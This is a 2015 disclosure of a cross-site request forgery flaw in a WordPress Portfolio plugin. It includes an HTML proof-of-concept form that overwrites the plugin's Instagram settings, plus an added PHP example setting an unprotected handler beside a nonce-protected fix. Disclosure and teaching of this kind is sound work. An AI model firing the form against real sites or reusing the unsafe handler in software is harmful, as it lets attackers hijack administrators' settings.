WordPress Portfolio 1.0 Cross Site Request Forgery
Posted on 21 July 2015
# Title: Cross-Site Request Forgery Vulnerability in Portfolio Plugin WordPress Plugin v1.0
# Submitter: Nitin Venkatesh
# Product: Portfolio Plugin WordPress Plugin
# Product URL: https://wordpress.org/plugins/portfolio-by-lisa-westlund/
# Vulnerability Type: Cross-site Request Forgery [CWE-352]
# Affected Versions: v1.0
# Tested versions: v1.0
# Fixed Version: v1.05
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1175403/portfolio-by-lisa-westlund
# Changelog: https://plugins.trac.wordpress.org/log/portfolio-by-lisa-westlund
# CVE Status: None/Unassigned/Fresh

## Product Information:

Use Instagram to display your portfolio. Choose whether to display all images from your account, or only the ones you tag with a custom hashtag.

## Vulnerability Description:

The admin settings form in Portfolio Plugin v1.0 (wp-admin/options-general.php?page=instagram-portfolio) is susceptible to CSRF: the handler saves the submitted values without verifying that the request originated from the plugin's own form, so a POST carrying the expected field names is accepted.

## Proof of Concept:

```html
<form action="http://localhost/wp-admin/options-general.php?page=instagram-portfolio" method="post">
  <input type="hidden" name="wplw_form_submitted" value='Y' />
  <input type="hidden" name="wplw_instagram_access_token" value='evil-token1' />
  <input type="hidden" name="wplw_instagram_userID" value='nitstorm' />
  <input type="hidden" name="wplw_hashtag" value='csrf' />
  <input type="hidden" name="wplw_settings_submit" value='Save' />
  <input type="submit" value="submit" />
</form>
```

## Solution:

Upgrade to v1.05 or later.

## Disclosure Timeline:

2015-06-03 - Discovered. Mailed developer.
2015-06-05 - Updated v1.05 released.
2015-07-20 - Publishing disclosure on FD mailing list.

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way be responsible as to how the information in this disclosure is used.
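For reference, the following is an added example of how a WordPress settings handler of this shape is protected against CSRF; it is not the plugin's code and not the patch in the linked changeset. The `wplw_*` field names are taken from the proof of concept above; the function names, the nonce action `wplw_save_settings` and the nonce field name `wplw_settings_nonce` are assumptions. The unsafe handler trusts the POST body alone, while the hardened one adds a capability check and a nonce tied to the form, using the standard `wp_nonce_field()` / `check_admin_referer()` pair.

```php
<?php
// Added example (not the plugin's code). Field names wplw_* come from the
// advisory's PoC; function names and nonce identifiers are hypothetical.

// Unsafe pattern: the only condition is that the expected fields are present,
// so a form hosted on any site and submitted by a logged-in administrator's
// browser (with the admin's cookies attached) overwrites the options.
function wplw_handle_settings_unsafe() {
    if ( ! isset( $_POST['wplw_form_submitted'] ) || 'Y' !== $_POST['wplw_form_submitted'] ) {
        return;
    }
    update_option( 'wplw_instagram_access_token', sanitize_text_field( wp_unslash( $_POST['wplw_instagram_access_token'] ) ) );
    update_option( 'wplw_instagram_userID',       sanitize_text_field( wp_unslash( $_POST['wplw_instagram_userID'] ) ) );
    update_option( 'wplw_hashtag',                sanitize_text_field( wp_unslash( $_POST['wplw_hashtag'] ) ) );
}

// Hardened pattern: require the manage_options capability, then require a
// valid nonce bound to this specific action. A cross-site page cannot read
// the nonce value out of the admin form, so a forged POST dies here with 403.
function wplw_handle_settings_hardened() {
    if ( ! isset( $_POST['wplw_form_submitted'] ) || 'Y' !== $_POST['wplw_form_submitted'] ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // check_admin_referer() verifies $_POST['wplw_settings_nonce'] against the
    // 'wplw_save_settings' action (and the referer) and calls wp_die() on failure.
    check_admin_referer( 'wplw_save_settings', 'wplw_settings_nonce' );

    update_option( 'wplw_instagram_access_token', sanitize_text_field( wp_unslash( $_POST['wplw_instagram_access_token'] ) ) );
    update_option( 'wplw_instagram_userID',       sanitize_text_field( wp_unslash( $_POST['wplw_instagram_userID'] ) ) );
    update_option( 'wplw_hashtag',                sanitize_text_field( wp_unslash( $_POST['wplw_hashtag'] ) ) );
}

// Rendering side: the legitimate form carries the matching nonce field, which
// is generated per user and session, so only this page can produce a POST
// that passes check_admin_referer() above.
function wplw_render_settings_form() {
    ?>
    <form method="post" action="">
        <?php wp_nonce_field( 'wplw_save_settings', 'wplw_settings_nonce' ); ?>
        <input type="hidden" name="wplw_form_submitted" value="Y" />
        <label>Access token
            <input type="text" name="wplw_instagram_access_token"
                   value="<?php echo esc_attr( get_option( 'wplw_instagram_access_token', '' ) ); ?>" />
        </label>
        <label>Instagram user ID
            <input type="text" name="wplw_instagram_userID"
                   value="<?php echo esc_attr( get_option( 'wplw_instagram_userID', '' ) ); ?>" />
        </label>
        <label>Hashtag
            <input type="text" name="wplw_hashtag"
                   value="<?php echo esc_attr( get_option( 'wplw_hashtag', '' ) ); ?>" />
        </label>
        <input type="submit" name="wplw_settings_submit" value="Save" />
    </form>
    <?php
}
```

The capability check and the nonce check address different things: `current_user_can()` confirms who is logged in, while `check_admin_referer()` confirms the request came from the plugin's own form rather than a third-party page. Replaying the proof-of-concept form against the hardened handler fails at the nonce check, since the attacker's form carries no `wplw_settings_nonce` value.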